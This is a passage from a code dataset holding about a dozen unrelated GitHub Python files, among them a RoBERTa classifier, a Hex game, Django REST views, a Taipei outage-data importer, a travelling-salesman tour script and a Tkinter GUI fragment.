new_labels=F.one_hot(labels.squeeze(1),num_classes=2)\n # print(f\"prediciton: {prediction.shape}\")\n # print(f\"new_labels: {new_labels.shape}\")\n loss=sigmoid_focal_loss(prediction,new_labels.float(),\n alpha=0.99,gamma=1,reduction=\"mean\")\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n predict_result = torch.nn.functional.softmax(outputs.logits, dim=1)\n predict_result = torch.argmax(predict_result, dim=1).cpu().numpy()\n\n # print(labels.shape,labels,predict_result.shape,predict_result)\n for ii in range(batch_size):\n if labels[ii][0] == predict_result[ii]:\n correct += 1\n \n if labels[ii][0] == 1 and predict_result[ii]==0:\n undetected += 1\n\n if labels[ii][0] == 1 and predict_result[ii]==1:\n detected += 1\n if i%100==0:\n print(f\"loss:{loss.item()}\")\n \n print(f\"Accuracy:{correct/((i+1)*batch_size)}\")\n print(f\"Recall:{detected/(detected+undetected)}\")\n\ndef test(test_loader,model,batch_size=32):\n correct = 0\n print(\"--------TEST---------\")\n for i,(inputs, labels) in enumerate(test_loader):\n outputs = model(inputs,labels=labels)\n loss = outputs.loss\n\n predict_result = torch.nn.functional.softmax(outputs.logits, dim=1)\n predict_result = torch.argmax(predict_result, dim=1).cpu().numpy()\n\n\n # print(labels.shape,labels,predict_result.shape,predict_result)\n for ii in range(batch_size):\n if labels[ii][0] == predict_result[ii]:\n correct += 1\n\n print(f\"TEST Accuracy:{correct/((i+1)*batch_size)}\")\n\ndef save_model(model):\n PATH = 'roberta_model.pkl'\n torch.save(model, PATH) \n\ndef main():\n # text = \"damn you, i've buy it\" # little test\n # inputs = tokenizer(text, return_tensors=\"pt\")\n\n # outputs = model(**inputs)\n # predicted = torch.nn.functional.softmax(outputs.logits, dim=1)\n # predicted = torch.argmax(predicted, dim=1).numpy()\n # print(predicted)\n EPOCH = 1\n LR = 3e-6 \n use_focal_loss=1\n DEVICE = torch.device(\"cuda:4\")\n BATCH_SIZE =32\n # BATCH_SIZE =4\n\n model = RobertaForSequenceClassification.from_pretrained('roberta-base')\n tokenizer = RobertaTokenizer.from_pretrained('roberta-base')\n optimizer = torch.optim.AdamW(model.parameters(), lr=LR)\n model = model.to(DEVICE)\n\n train_loader,test_loader,valid_loader = preprocess(tokenizer=tokenizer,device=DEVICE,batch_size=BATCH_SIZE)\n\n train(model=model, optimizer=optimizer, train_loader=train_loader, batch_size=BATCH_SIZE,EPOCH=EPOCH,LR=LR,use_focal_loss=use_focal_loss,DEVICE=DEVICE,)\n save_model(model=model)\n\n \n PATH = 'roberta_model.pkl'\n model=torch.load(PATH)\n model.to(DEVICE)\n test(test_loader=test_loader,model=model,batch_size=BATCH_SIZE)\n\n \nif __name__ == '__main__':\n main()\n\n","repo_name":"liangzid/TEMP","sub_path":"tod/soloist/robertaCLS/roberta_classifier.py","file_name":"roberta_classifier.py","file_ext":"py","file_size_in_byte":11315,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"57"} +{"seq_id":"3715789817","text":"import unittest\nfrom unittest import mock\nfrom jirabuddy import JiraBuddy\n\n\nclass JiraBuddyTestCase(unittest.TestCase):\n @mock.patch(\"jirabuddy.JIRA\")\n def testConnectToJira(self, mock_jira):\n mock_jira.return_value = \"blubb\"\n \n j = JiraBuddy()\n ret = j.connectToJira(\"http://127.0.0.1\")\n assert ret == \"blubb\"\n\n","repo_name":"haloz/learnpy","sub_path":"mock2/jirabuddy_test.py","file_name":"jirabuddy_test.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"7994641143","text":"# 서로 같은 반이였던 사람이 많은 학생을 임시반장으로 선출하려고 함\r\n# 임시 반장으로 정해진 학생의 번호를 출력하는데 여러 명인 경우에 가장 작은 번호만 출력\r\n\r\nN = int(input())\r\nstudents = []\r\nfor i in range(N):\r\n students.append([int(j) for j in input().split()])\r\n\r\nmax_friend = -1\r\nbanjang = -1\r\nfor student_no in range(N):\r\n result = set()\r\n for grade in range(5):\r\n for friend in range(N):\r\n if students[student_no][grade] == students[friend][grade]:\r\n result.add(friend)\r\n\r\n if len(result) > max_friend:\r\n banjang = student_no + 1\r\n max_friend = len(result)","repo_name":"tjrmswo/Algorithm","sub_path":"bronzeⅠ/1268.py","file_name":"1268.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"32693613136","text":"import copy\nfrom typing import List, Tuple\nfrom .state import State\nfrom .sim_world import SimWorld\nimport numpy as np\nimport random\n\n\nclass HexGame(SimWorld):\n def __init__(self, K: int):\n self.set_board_size(K)\n return\n\n def get_initial_state(self) -> State:\n return State(np.zeros((self.board_size**2)), 1 if random.random() > 0.5 else 2)\n\n def get_legal_actions(self, state: State) -> List[int]:\n return list(np.where(state.state == 0)[0])\n\n def get_total_amount_of_actions(self) -> int:\n return self.board_size**2\n\n def set_board_size(self, K):\n \"\"\"\n set the board size of the hex game\n \"\"\"\n self.board_size = K\n self.action_index_to_neighbors: List[List[int]] = []\n for action in range(K**2):\n self.action_index_to_neighbors.append(self.get_neighbors(action))\n\n return\n\n def get_new_state(\n self, SAP: Tuple[State, int], verbose=False\n ) -> Tuple[State, bool, int]:\n player = SAP[0].player\n state = copy.deepcopy(SAP[0])\n action = SAP[1]\n\n if state.state[action] != 0:\n raise Exception(\n \"Cannot put piece where there is already one placed!\")\n\n is_winning_move = self.is_winning_move(SAP)\n reward = 0\n\n if is_winning_move:\n reward = 1 if player == 1 else -1\n\n state.state[action] = state.player\n state.player = ((state.player) % 2) + 1\n\n return (state, is_winning_move, reward)\n\n def is_winning_move(self, SAP: Tuple[State, int]) -> bool:\n \"\"\"\n checks if the current move results in a win for the given player\n \"\"\"\n # find walls hit connecting from placed piece\n walls = self.search(SAP[0], SAP[1])\n\n # if both walls are reached from the placed piece (0 and 1), the move is a winning move\n if 0 in walls and 1 in walls:\n return True\n\n # otherwise, not a winning move\n return False\n\n def visualize_state(self, state: State):\n \"\"\"\n visualize the board in a diamond shape\n \"\"\"\n string_builder = \"\"\n\n counter = 0\n\n while counter < 2 * self.board_size - 1:\n for _ in range(abs(self.board_size - counter - 1)):\n string_builder += \" \"\n\n lst = []\n\n for i in range(self.board_size):\n for j in range(self.board_size):\n if i + j == counter:\n lst.append(\n int(state.state[self.from_row_col_to_action(\n (j, i))])\n )\n\n for i in lst:\n string_builder += str(i) + \" \"\n\n string_builder += \"\\n\"\n counter += 1\n\n print(string_builder)\n\n return\n\n def search(self, state: State, node: int):\n # check if spot is the players wall\n queue = [node]\n visited = set(())\n walls = set(())\n\n while len(queue) > 0:\n node = queue.pop()\n visited.add(node)\n walls.add(self.is_action_wall(node, state.player))\n for neighbour in self.action_index_to_neighbors[node]:\n if (\n int(state.state[neighbour]) == state.player\n and neighbour not in visited\n ):\n queue.append(neighbour)\n\n return walls\n\n def is_action_wall(self, action: int, player: int) -> int:\n \"\"\"\n returns 0 and 1 if given spot for player is a wall, depending on the wall.\n returns -1 if not a wall.\n \"\"\"\n (row, col) = self.from_action_to_row_col(action)\n\n if player == 1:\n if row == 0:\n return 0\n elif row == self.board_size - 1:\n return 1\n\n elif player == 2:\n if col == 0:\n return 0\n if col == self.board_size - 1:\n return 1\n\n return -1\n\n def get_neighbors(self, action: int) -> List[int]:\n \"\"\"\n find neighbors for position of given action\n \"\"\"\n (row, col) = self.from_action_to_row_col(action)\n neighbors: List[int] = []\n\n if row + 1 < self.board_size:\n neighbors.append(self.from_row_col_to_action((row + 1, col)))\n if col - 1 >= 0:\n neighbors.append(\n self.from_row_col_to_action((row + 1, col - 1)))\n if col + 1 < self.board_size:\n neighbors.append(self.from_row_col_to_action((row, col + 1)))\n\n if row - 1 >= 0:\n neighbors.append(self.from_row_col_to_action((row - 1, col)))\n if col + 1 < self.board_size:\n neighbors.append(\n self.from_row_col_to_action((row - 1, col + 1)))\n if col - 1 >= 0:\n neighbors.append(self.from_row_col_to_action((row, col - 1)))\n\n return neighbors\n\n def from_row_col_to_action(self, row_col: Tuple[int, int]) -> int:\n (row, col) = (row_col[0], row_col[1])\n return row * self.board_size + col\n\n def from_action_to_row_col(self, action: int) -> Tuple[int, int]:\n \"\"\"\n translates action integer to row/column in hex board\n \"\"\"\n return (action // self.board_size, action % self.board_size)\n\n def get_n_observations(self) -> int:\n return self.board_size**2\n\n def is_end_state(self) -> bool:\n return True\n","repo_name":"Haavasma/IT3105_Project_2","sub_path":"SimWorlds/HexGame.py","file_name":"HexGame.py","file_ext":"py","file_size_in_byte":5475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"44017404787","text":"import logging\nimport random\nimport enum\n\nimport shc\nfrom shc.interfaces.telegram import SimpleTelegramAuth, TelegramBot\nfrom shc.web.widgets import *\n\n\n# An enum of special values\nclass Fruits(enum.Enum):\n APPLES = 0\n LEMONS = 1\n BANANAS = 2\n\n\n# Some State variables to interact with\nfoo = shc.Variable(bool, 'foo', initial_value=False)\nbar = shc.Variable(bool, 'bar', initial_value=False)\nfoobar = shc.Variable(bool, 'foobar', initial_value=False)\nnumber_of_yaks = shc.Variable(int, 'number_of_yaks', initial_value=0)\nyak_name = shc.Variable(str, 'yak_name')\n\n\n# A web server\nweb_server = shc.web.WebServer('localhost', 8080, index_name='index')\n\nindex_page = web_server.page('index', 'Home', menu_entry=True, menu_icon='home')\n\nindex_page.add_item(ButtonGroup(\"State of the foobar\", [\n ToggleButton(\"Foo\").connect(foo),\n ToggleButton(\"Bar\", color='red').connect(bar),\n ToggleButton(\"Foobar\", color='black').connect(foobar),\n]))\nindex_page.add_item(TextInput(int, \"Number of yaks\", min=0, max=100, step=1, input_suffix=\"pc.\")\n .connect(number_of_yaks))\nindex_page.add_item(TextInput(str, \"Yak's name\")\n .connect(yak_name))\n\n# The Telegram bot\ntelegram_auth = SimpleTelegramAuth({'michael': 123})\ntelegram_bot = TelegramBot(\"123456789:exampleTokenXXX\", telegram_auth)\n\ntelegram_bot.on_off_connector(\"Foo\", {'michael'}).connect(foo)\ntelegram_bot.on_off_connector(\"Bar\", {'michael'}).connect(bar)\ntelegram_bot.on_off_connector(\"Foobar\", {'michael'}).connect(foobar)\ntelegram_bot.str_connector(\"Yak Name\", {'michael'}).connect(yak_name)\ntelegram_bot.generic_connector(int, \"Yak Number\", lambda x: str(x), lambda x: int(x), {'michael'})\\\n .connect(number_of_yaks)\n\n# For Python 3.7 compatibility, we store the trigger in a variable first, before applying it as a decorator to the logic\n# handler function. From Python 3.8 on, you can simply write the full expression as a decorator.\nrandom_yaks_trigger = telegram_bot.trigger_connector(\"Random Yaks\", {'michael'}).trigger\n\n\n@random_yaks_trigger\n@shc.handler()\nasync def random_yaks(_v, _o):\n await number_of_yaks.write(random.randint(0, 255))\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG)\n shc.main()\n","repo_name":"mhthies/smarthomeconnect","sub_path":"example/telegram.py","file_name":"telegram.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"57"} +{"seq_id":"32613612530","text":"from django.shortcuts import render\nfrom django.http import JsonResponse\nfrom rest_framework import status\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom .serializers import *\n\nfrom .models import channel\n\n@api_view(['GET'])\ndef apiOverview(request):\n api_urls = {\n 'List_stories_channels':'/channels-list/',\n 'stories_channels_Detailview':'channels-view/',\n 'Create_stories_channels':'/create-channel/',\n 'Update-stories_channels': '/channel-update//',\n 'Delete_stories_channels': '/channels-delete//',\n }\n\n return Response(api_urls)\n\n@api_view(['GET'])\ndef stories_channels_List(request):\n _channels = story_channels.objects.all()\n serializer = story_channelsSerializer(_channels , many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef stories_channels_detail(request , pk):\n _channel = story_channels.objects.get(pk=pk)\n serializer = story_channelsSerializer(_channel , many=False)\n\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef create_stories_channels(request):\n serializer = story_channelsSerializer(data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef update_stories_channels(request , pk):\n _channel = story_channels.objects.get(pk=pk)\n serializer = story_channelsSerializer( instance=_channel, data=request.data)\n\n if serializer.is_valid():\n serializer.save()\n\n return Response(serializer.data)\n\n@api_view(['DELETE'])\ndef Delete_stories_channels(request, pk):\n _channel = story_channels.objects.get(pk=pk)\n _channel.delete()\n\n return Response(status=status.HTTP_204_NO_CONTENT)\n","repo_name":"GHASSAN007/Podcast","sub_path":"Podcast_Mini_Backend/Channels/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"15214055001","text":"import numpy as np\nimport scipy as sc\n\ndef compute_DCT(f):\n \"\"\"Compute the 1D discrete cosine transform \n\n Parameter:\n f (numpy array): function\n Return:\n k (numpy array): modes\n Fk (numpy array): cosine transform coefficients\n \"\"\"\n N = len(f)\n Fk = sc.fft.dct(f, 1)/N\n Fk[0] = Fk[0]/2\n Fk[-1] = Fk[-1]/2\n k = np.arange(0, N)\n return k, Fk\n","repo_name":"mulligatawny/me408-hw5","sub_path":"compute_DCT.py","file_name":"compute_DCT.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"10309773371","text":"# coding=utf-8\n\nfrom abc import ABCMeta, abstractmethod\nfrom collections import namedtuple\nfrom datetime import datetime, timezone, timedelta\nimport os\nimport shutil\nimport time\nimport urllib.parse\nimport uuid\nimport zipfile\nimport requests\n\nfrom . import map_converter\nfrom . import datetime_parser\nfrom . import location_parser\nfrom . import power_web_parser\nfrom .dbconnector import DBConnector\nfrom .dbschema import Event, Coordinate, EventType\n\nLDB_URL = os.environ['LDB_URL']\nTZ = timezone(timedelta(hours=8))\n\nclass DataImporter(object):\n __metaclass__ = ABCMeta\n\n def __init__(self):\n self.connect = DBConnector(LDB_URL)\n self.session = self.connect.get_session()\n\n @abstractmethod\n def get_event_type(self):\n pass\n\n @abstractmethod\n def get_raw_data(self):\n pass\n\n @abstractmethod\n def generate_events(self, source):\n pass\n\n def import_data(self):\n source = self.get_raw_data()\n if not source:\n return\n\n self._set_events_inactive()\n\n for e in self.generate_events(source):\n e.is_active = True\n if e.is_valid():\n self._insert_entry(e)\n\n self.session.commit()\n self.session.close()\n\n def _set_events_inactive(self):\n for e in self.session.query(Event)\\\n .filter(Event.type == self.get_event_type())\\\n .filter(Event.is_active == True):\n e.is_active = False\n\n def _insert_entry(self, e):\n with self.session.no_autoflush:\n existed = self.session.query(Event)\\\n .filter(Event.gov_sn == e.gov_sn)\\\n .filter(Event.type == e.type)\\\n .filter(Event.city == e.city)\\\n .filter(Event.district == e.district)\\\n .filter(Event.detail_addr == e.detail_addr)\\\n .filter(Event.start_date == e.start_date)\\\n .filter(Event.end_date == e.end_date)\\\n .filter(Event.start_time == e.start_time)\\\n .filter(Event.end_time == e.end_time)\\\n .filter(Event.description == e.description)\\\n .first()\n if existed:\n existed.update_time = datetime.now(TZ)\n existed.is_active = True\n else:\n e.update_time = e.create_time = datetime.now(TZ)\n self.session.add(e)\n\n\nclass WaterImporter(DataImporter):\n\n _WATER_SOURCE = 'http://data.taipei/opendata/datalist/apiAccess?scope=resourceAquire&rid=a242ee9b-b954-4ae9-9827-2344c5dfeaea'\n\n def __init__(self):\n super().__init__()\n\n def get_event_type(self):\n return EventType.water\n\n def get_raw_data(self):\n response = requests.get(self._WATER_SOURCE)\n if response.status_code == 200:\n print('Web (WATER OUTAGE) request is ok.')\n return response.json()\n else:\n print('Web (WATER OUTAGE) request is NOT ok. Response status code = %s.'\n % response.status_code)\n return None\n\n def generate_events(self, source):\n for event_water in source['result']['results']:\n timeinfo = datetime_parser.parse_water_road_time(event_water['Description'])\n coordinates = event_water['StopWaterSection_wgs84']['coordinates'][0]\n\n # Convert coordinate to address\n latitude = coordinates[0][1]\n longitude = coordinates[0][0]\n address = map_converter.convert_coordinate_to_address(latitude, longitude)\n\n location_info = location_parser.parse_water_address(address)\n \n description_info = location_parser.parse_water_description(event_water['Description'])\n\n event_model = Event(\n id=get_uuid(),\n type=self.get_event_type(),\n gov_sn=event_water['SW_No'],\n city=location_info[0],\n district=location_info[1],\n detail_addr=location_info[2],\n start_date=datetime_parser.roc_to_common_date(event_water['FS_Date']),\n end_date=datetime_parser.roc_to_common_date(event_water['FC_Date']),\n start_time=timeinfo[0],\n end_time=timeinfo[1],\n description=description_info,\n )\n for coor in coordinates:\n event_model.coordinates.append(Coordinate(id=get_uuid(),\n wgs84_latitude=coor[1],\n wgs84_longitude=coor[0]))\n yield event_model\n\n\nclass RoadImporter(DataImporter):\n\n _ROAD_SOURCE = 'http://data.taipei/opendata/datalist/apiAccess?scope=resourceAquire&rid=201d8ae8-dffc-4d17-ae1f-e58d8a95b162'\n\n def __init__(self):\n super().__init__()\n\n def get_event_type(self):\n return EventType.road\n\n def get_raw_data(self):\n response = requests.get(self._ROAD_SOURCE)\n if response.status_code == 200:\n print('Web (ROAD CONSTRUCTION) request is ok.')\n return response.json()\n else:\n print('Web (ROAD CONSTRUCTION) request is NOT ok. Response status code = %s.'\n % response.status_code)\n return None\n\n def generate_events(self, source):\n for event in source['result']['results']:\n timeinfo = datetime_parser.parse_water_road_time(event['CO_TI'])\n\n # Convert TWD97 to WGS84\n latitude, longitude = map_converter.twd97_to_wgs84(float(event['X']), float(event['Y']))\n\n # Convert coordinate to address\n address = map_converter.convert_coordinate_to_address(latitude, longitude)\n\n location_info = location_parser.parse_road_address(address)\n\n event_model = Event(\n id=get_uuid(),\n type=self.get_event_type(),\n gov_sn='#'.join((event['AC_NO'], event['SNO'])),\n city=location_info[0],\n district=location_info[1],\n detail_addr=location_info[2],\n start_date=datetime_parser.roc_to_common_date(event['CB_DA']),\n end_date=datetime_parser.roc_to_common_date(event['CE_DA']),\n start_time=timeinfo[0],\n end_time=timeinfo[1],\n description=event['NPURP'],\n )\n event_model.coordinates.append(Coordinate(id=get_uuid(),\n wgs84_latitude=latitude,\n wgs84_longitude=longitude))\n yield event_model\n\n\nclass PowerImporter(DataImporter):\n\n _POWER_SOURCE = 'http://branch.taipower.com.tw/Content/NoticeBlackout/bulletin.aspx?SiteID=564732646551216421&MmmID=616371300113254267'\n\n def __init__(self):\n super().__init__()\n\n def get_event_type(self):\n return EventType.power\n\n def get_raw_data(self):\n response = requests.get(self._POWER_SOURCE)\n if response.status_code == 200:\n print('Web (POWER OUTAGE) request is ok.')\n \n info = power_web_parser.get_html_info(response)\n return info\n else:\n print('Web (POWER OUTAGE) request is NOT ok. Response status code = %s.' % response.status_code)\n return None\n\n def generate_events(self, source):\n # arrange data and insert to table\n for event in source:\n \n (date_info, start_time_info, end_time_info, sn_info, description_info, location_info, latitude, longitude) = event\n \n event_model = Event(\n id=get_uuid(),\n type=self.get_event_type(),\n gov_sn=sn_info,\n city=location_info[0],\n district=location_info[1],\n detail_addr=location_info[2],\n start_date=date_info,\n end_date=date_info,\n start_time=start_time_info,\n end_time=end_time_info,\n description=description_info,\n )\n event_model.coordinates.append(Coordinate(id=get_uuid(),\n wgs84_latitude=latitude,\n wgs84_longitude=longitude))\n yield event_model\n\n\n### Import all types of livelihood data ###\ndef import_all():\n WaterImporter().import_data()\n RoadImporter().import_data()\n PowerImporter().import_data()\n\n\n### Create livelihood database ###\ndef create_tables():\n connect = DBConnector(LDB_URL)\n connect.create_tables()\n\n\ndef get_uuid():\n return str(uuid.uuid4())\n\n\n","repo_name":"StudyNightClub/livelihood-database","sub_path":"livelihood_database/livelihood.py","file_name":"livelihood.py","file_ext":"py","file_size_in_byte":8559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"24881979635","text":"\"\"\"\r\nThis program takes a list of cities (with distance to other cities) and a starting\r\ncity of the user's choice.\r\nIt then creates a tour starting in starting city, visiting all other cities,\r\nand goes back to starting city. It uses the nearest neighbour algorithm to\r\nchoose what city to visit next (visit whatever unvisited city which is closest),\r\nin hope to minimize total distance travelled.\r\n\r\nWe have opted to let the user create several Tours and therefor also let them\r\nchoose the ID for each tour they generate, since it could be a tour per salesman,\r\nor simply to compare different tours.\r\n\r\nInput: TourID, List of cities, starting city\r\nOutput: Tour of cities to visit in order, and total distance travelled.\r\n\r\nWe assume the user is able to provide the input list in the format of\r\n\"City1\", {\"City2\": Distance, \"City3\": Distance}\" for each city, as shown\r\nin the test.\r\n\r\nOur interpretation of the task is that the user will only provide a list of\r\ncities they actually want to include in tour.\r\n\"\"\"\r\n# Creating class City\r\n\r\nclass City:\r\n # Using init to pass name and distance list\r\n def __init__(self, name, distances):\r\n self.name = name\r\n if type(distances) == dict:\r\n self.distances = distances\r\n else:\r\n print(\"Invalid data input, distance list is not in dict format\")\r\n exit()\r\n\r\n\r\n\r\n # Using magic repr method for printable representation\r\n def __repr__(self):\r\n return self.name\r\n\r\n # Creating method to check distance to given city:\r\n def distanceTo(self, toCity):\r\n # Using try except to catch unexpected errors\r\n try:\r\n # Returns the distance to the toCity\r\n return self.distances[toCity]\r\n # If toCity key not found in distances dictionary of city:\r\n except KeyError:\r\n # Print error\r\n print(\"Cannot retrieve distance from {city} to {toCity}. Please revise dataset.\")\r\n # And exit, as it makes no sense to continue if data is missing for this task.\r\n exit()\r\n\r\n# Create class tour\r\n\r\nclass Tour:\r\n # Using init to pass variable tourID and create tourCities dict\r\n def __init__(self, tourid):\r\n # First pass tourID\r\n self.tourid = tourid\r\n # Create list to put the cities for the tour\r\n self.tourCities = {}\r\n\r\n # Using magic method __str__ for a printable representation\r\n def __str__(self):\r\n # Returning the tour ID and the list of cities to visit by the keys\r\n # in the dictionary tourCities. This is turned into a list then string\r\n # to print (and stripped of brackets), for better readability for the user than simply\r\n # printing the dictionary keys directly.\r\n return(\"Tour ID: #{} \\nCities to visit: {}\".format(self.tourid, str(list(self.tourCities.keys())).strip(\"[]\")))\r\n\r\n # Create method addCity\r\n def addCity(self, name, distances):\r\n \"\"\"\r\n This method adds a city to the tours tourCities list. It takes the\r\n city name and dictionary of distances as variables.\r\n \"\"\"\r\n # Create instance of city(with distances) and add it to tourCities\r\n self.tourCities[name] = City(name, distances)\r\n\r\n\r\n\r\n # Creating findTour method\r\n def findTour(self, startCity, inputList):\r\n \"\"\"\r\n This method takes starting city startCity and list of cities\r\n inputList as input. It returns an ordered list of cities to visit and\r\n the total distance travelled. The order is determined by the nearest\r\n neighbour algorithm where it chooses the next city by whatever\r\n unvisited city is closest.\r\n \"\"\"\r\n\r\n # Start for loop to add all cities from inputList to tourCity\r\n # This is put here as it is our interpretation that the user would not\r\n # provide cities in inputList that should not be added to the Tour.\r\n # If that was the case, this for loop could be removed and the user could\r\n # use addCity function for the cities wanted.\r\n for cityname, distances in inputList:\r\n # Calling addCity method for all elements in inputList\r\n self.addCity(cityname, distances)\r\n\r\n # Creating a list of unvisited cities by tourCities dictionary keys\r\n self.citiesLeft = list(self.tourCities.keys())\r\n\r\n # Removing starting city from the unvisited cities list\r\n self.citiesLeft.remove(startCity)\r\n\r\n # Initialize list of final route, starting with the starting city\r\n # In this list we only store the names(strings).\r\n finalTour = [startCity]\r\n\r\n # Initialize variable for final distance\r\n finalDistance = 0\r\n\r\n # Setting starting city as variable fromCity for first step\r\n fromCity = startCity\r\n\r\n # Starting while loop\r\n # Will keep going until there are no cities left to visit\r\n while (self.citiesLeft):\r\n\r\n # Create bestCity variable which will be city we go to\r\n bestCity = None\r\n\r\n # Create empty list of distances to remaining cities from fromCity\r\n possibleDistances = []\r\n\r\n # Starting for loop for each unvisited city left:\r\n for city in self.citiesLeft:\r\n #Get the distance from fromCity to other cities in list\r\n # Adding name of city and distance from fromCity to city to possibleDistances as a tuple\r\n possibleDistances.append((self.tourCities[city].name, self.tourCities[fromCity].distanceTo(city)))\r\n # The above operation could have been solved with list comprehension but as we\r\n # wish to return 2 values, we found that using a for loop gives better readability\r\n # in the code.\r\n\r\n # End for loop\r\n\r\n # To sort the list of possible distances, we make use of lambda to make a\r\n # quick function so we can sort by value (which is stored at position 1\r\n # in each element of the list)\r\n possibleDistances.sort(key=lambda x: x[1])\r\n # The list is now sorted.\r\n\r\n # Set variable bestCity to be the city at the first spot in the now sorted list\r\n # of distances, ie the closest City.\r\n bestCity = possibleDistances[0][0]\r\n\r\n # Add name of city to final tour list of cities to visit in order\r\n finalTour.append(bestCity)\r\n\r\n # Add distance from previous city to bestCity to total distance.\r\n # The distance is stored in possibleDistance list at position 1 in each element.\r\n # We know it is element 0 as the list is sorted in ascending order.\r\n finalDistance = finalDistance + possibleDistances[0][1]\r\n\r\n # Remove the name of best city from citiesLeft\r\n self.citiesLeft.remove(bestCity)\r\n\r\n # Change fromCity to the new city\r\n fromCity = bestCity\r\n\r\n # The salesman has now travelled to a new city and the loop can\r\n # start over as long as there are unvisited cities left.\r\n\r\n # End while loop\r\n\r\n # Return to starting city: Adding starting city as final city\r\n finalTour.append(self.tourCities[startCity].name)\r\n\r\n # Adding distance from current city to starting city.\r\n finalDistance = finalDistance + self.tourCities[fromCity].distanceTo(startCity)\r\n\r\n # Return the ordered list of cities to visit as well as the final distance travelled\r\n return(finalTour, finalDistance)\r\n\r\n\r\n\r\n\r\n\"\"\"\r\nCode for testing the program:\r\n\"\"\"\r\n# Create a function to test with given starting city\r\ndef testScript(startCity, TourID, inputList):\r\n \"\"\"\r\n This function is created to test the program.\r\n It will create a new tour with given TourID, and call the findTour function\r\n which will add the list of cities inputList to the Tour and create the\r\n tour itself starting (and ending) in startCity.\r\n This function then prints the results.\r\n \"\"\"\r\n # Create a tour instance\r\n TourID = Tour(TourID)\r\n # Save the ordered list of tourOrder and variable tourDistance to 2 variables\r\n tourOrder, tourDistance = TourID.findTour(startCity, inputList)\r\n # Print the tour ID (and list of cities to visit, unordered)\r\n print(\"--- NEW TOUR --- \\n\"\r\n f\"{TourID}\")\r\n # Print the ordered list of cities, removing brackets for readability\r\n print(\"List of cities to visit in order: {}\".format(str(tourOrder).strip(\"[]\")))\r\n # Printing distance travelled, limiting answer to 2 decimals\r\n # This is done due the computer's format (floating-point) that cannot represent\r\n # a number like 0.1, 0.2 or 0.3.\r\n # Source: https://floating-point-gui.de/basic/\r\n # Solution inspired from: https://docs.python.org/3/library/string.html#grammar-token-format-spec\r\n print(f\"Total distance travelled: {(tourDistance):.2f}) \\n\"\r\n \"Thank you for using this program. \\n\")\r\n\r\n# For testing function: activating when program is opened (not imported)\r\nif __name__ == \"__main__\":\r\n\r\n # Adding list of example cities from task\r\n inputList = [\r\n (\"Bergen\", {\"Oslo\": 7.14, \"Stavanger\": 4.42, \"Trondheim\": 9.3, \"Kristiansand\": 7.39}),\r\n (\"Oslo\", {\"Bergen\": 6.47, \"Stavanger\": 7.10, \"Trondheim\": 6.10, \"Kristiansand\": 3.56}),\r\n (\"Kristiansand\", {\"Oslo\": 4.3, \"Bergen\": 7.45, \"Trondheim\": 10.17, \"Stavanger\": 3.33}),\r\n (\"Stavanger\", {\"Oslo\": 7, \"Bergen\": 4.48, \"Trondheim\": 13.37, \"Kristiansand\": 3.14}),\r\n (\"Trondheim\", {\"Oslo\": 6.24, \"Bergen\": 9.34, \"Stavanger\": 13.36, \"Kristiansand\": 10.12})\r\n ]\r\n\r\n # Running testScript function for Oslo and Bergen\r\n testScript(\"Oslo\", \"TestTour1Oslo\", inputList)\r\n testScript(\"Bergen\", \"TestTour2Bergen\", inputList)\r\n","repo_name":"siberianlikeyou/pythonhw2","sub_path":"testny.py","file_name":"testny.py","file_ext":"py","file_size_in_byte":9794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"42072201231","text":"# mas = []\n# n = int(input('input the quantity of items '))\n# m = 0\n\n# for i in range(n):\n# mas.append(int(input('input item ')))\n\n# print (mas)\n\n### Или вот так (создание массива)\n\nl1 = [int(input(f\"Введите элемент массива {i + 1}: \")) for i in range(int(input(\"Введите длину массива: \")))]\n\n# i, n, count = 1, len(l1) - 1, 0\n# while il1[i+1]:\n# count += 1\n# i+=1\n\ni, count = 1, 0\n\nfor i in range(i,len(l1) - 1):\n if l1[i-1]l1[i+1]:\n count += 1\n\nprint(count)\n\n\n","repo_name":"dianovsd/geekbraines","sub_path":"python/seminar/6 seminar/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"57"} +{"seq_id":"16898837040","text":"import tkinter as tk\nimport threading\nfrom QueueWatcher import QueueWatcher\nimport time \nimport tkinter.messagebox as messagebox\nfrom datetime import datetime\nfrom utils import is_valid_email, logger\nimport os, sys\n\ndef resource_path(relative_path):\n try:\n base_path = sys._MEIPASS\n except Exception:\n base_path = os.path.abspath(\".\")\n\n return os.path.join(base_path, relative_path)\nclass QueueWatcherGUI:\n def __init__(self):\n self.queue_watcher = QueueWatcher()\n self.root = tk.Tk()\n self.root.title(\"Overwatch Queue Watcher\")\n self.root.iconbitmap(resource_path(\"hollow.ico\"))\n self.root.geometry(\"600x600\")\n self.root.resizable(False, False)\n self.root.configure(background=\"sky blue\")\n\n # Create a frame to hold the widgets in the right column\n self.right_frame = tk.Frame(self.root)\n self.right_frame.pack(side=\"right\", fill=\"both\", expand=True)\n self.right_frame.configure(background=\"snow\")\n\n #add current time status label\n self.time_label = tk.Label(self.right_frame, text=\"Current 